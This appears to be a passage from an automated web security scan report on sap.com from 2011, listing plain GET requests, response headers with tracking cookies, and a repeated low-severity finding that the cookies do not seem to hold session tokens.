{"method":"TrackEventInteraction","arguments":["http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy","","CLICK","Shop the Business Center","http://store.sap.com/","","ClickArea=CTA"," ...[SNIP]...
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:46 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:46 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 14:32:46 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /asset/index.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 18873 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:58 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:58 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:03:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 302 Found Cache-Control: private Content-Length: 251 Content-Type: text/html; charset=utf-8 Location: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/ Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 14:32:09 GMT
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore& ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/formAbandonWarning.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 4767 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:57 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:57 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /customer-showcase/growth/index.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 43268 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:37 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:37 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:37 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /customer-showcase/meetcustomers/index.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42048 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:38 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://www.sap.com/host.epx?kNtBzmUK9zU">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hana/index.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23602 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:17 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:17 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:17 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /lines-of-business/lines-of-business-spotlight.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 22042 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:05 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:05 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000009,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:05 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42472 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:27 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:27 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:27 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>